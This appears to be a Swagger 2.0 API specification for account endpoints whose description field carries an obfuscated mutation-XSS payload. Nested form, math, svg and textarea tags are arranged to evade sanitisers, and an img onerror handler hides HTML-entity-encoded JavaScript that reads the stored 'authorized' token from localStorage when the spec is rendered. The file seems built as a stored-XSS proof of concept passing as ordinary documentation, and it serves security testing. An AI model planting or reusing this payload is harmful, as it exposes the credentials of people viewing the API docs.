swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=\"&#x76;&#x61;&#x72;&#x20;&#x61;&#x3d;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x53;&#x74;&#x6f;&#x72;&#x61;&#x67;&#x65;&#x2e;&#x67;&#x65;&#x74;&#x49;&#x74;&#x65;&#x6d;&#x28;&#x27;&#x61;&#x75;&#x74;&#x68;&#x6f;&#x72;&#x69;&#x7a;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x61;&#x29;&#x3b;\" src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  /accounts/groupid/{id}:
    get:
      parameters:
        - name: id
          in: path
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccountById
      summary: Finds an account by ID
definitions:
  Account:
    type: object
    properties:
      id:
        type: integer
      name:
        type: string
securityDefinitions:
  basicAuth:
    type: basic
